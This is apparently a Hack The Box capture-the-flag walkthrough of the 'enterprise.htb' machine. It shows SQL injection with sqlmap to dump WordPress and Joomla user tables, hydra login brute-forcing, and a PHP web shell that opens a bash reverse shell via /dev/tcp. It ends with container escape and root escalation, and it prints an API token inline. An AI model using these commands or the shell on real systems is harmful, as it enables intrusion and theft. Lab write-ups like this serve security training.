wpscan --url http://enterprise.htb --enumerate vp --detection-mode aggressive --api-token hiTsAJ9Ki5HQTsqii95b6Ge8oZibBkcoKNgfalSOrcA


Wordpress instance

We can confirm that we have a plugin name lcars

We don’t get anything, but running the following command we are able to enumerate the posts

for i in $(seq 0 100); do curl --silent http://enterprise.htb/wp-content/plugins/lcars/lcars_dbpost.php\?query\=$i >> posts; done;
grep --text -v '^[[:space:]]*$' posts

We have found some interesting content

Looking at lcars_db.php we can see that the parameter “query” isn’t sanitised

and we can see that we have a sql injection

Using sqlmap we can confirm the vulnerability and get access to the machine

sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php\?query\=2

sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php\?query\=2 --dbs

sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php\?query\=2 -D wordpress -T wp_users --dump

sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php\?query\=2 --sql-query "select id,post_name,post_content,post_excerpt from wp_posts where id=66 limit 0,1;"


Brute force Wordpress admin

Using the following command, we have found the password for user william.riker

hydra -l william.riker -P passwords.txt -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Low permissions access


 $port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ; 

 if(isset($_REQUEST['ip'])) {
   exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
 } elseif(isset($_REQUEST['cmd'])) {
   echo exec($_REQUEST['cmd']);

curl http://enterprise.htb/wp-content/plugins/lcars/lcars\?ip\=

Low access privileges


Joomla instance

sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php\?query\=2 -D joomladb -T edz2g_users --dump

Brute force Wordpress admin

Using the following command, we have found the password for user

python /opt/CMSmap/ http://enterprise.htb:8080 -u users_joomla.txt -p passwords.txt -v


 $port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ; 

 if(isset($_REQUEST['ip'])) {
   exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
 } elseif(isset($_REQUEST['cmd'])) {
   echo exec($_REQUEST['cmd']);

curl http://enterprise.htb:8080\?ip\=\&port\=4444

Low permissions access

Using mount -l command we can see where the website folder is mounted from and we also see that we have read/write permissions

We have spotted an interesting file

Let’s replace that IP with ours using the following sed command

sed -i 's/' wordpress-shell.php

calling the url curl http://enterprise.htb:8080/wordpress-shell.php we get a reverse shell on the machine (not the host machine)

after few some more researchs we noticed that we should have used the folder /files in the first place. So placing our reverse shell in the folder /var/www/html/files/ exposed our file on the following url https://enterprise.htb/files/wordpress-shell.php

Using the following command

curl -k https://enterprise.htb/files/wordpress-shell.php

we get a shell in a the host machine

IPs hierarchy

Looking at the ips, we can see that:

  • is the host machine
  • is the Joomla container
  • is the Wordpress container

Privilege escalation

The SUID enumeration reveals the following

Looks like the same application available on port 32812 of the machine

Let’s get the utility in our local

Looking into the program with ltrace ./lcars we have found the bridge access code: picarda1

I wasn’t able to go further with this challenge, after many attempts I found a solution on this repo

Thanks to that script we got a shell as root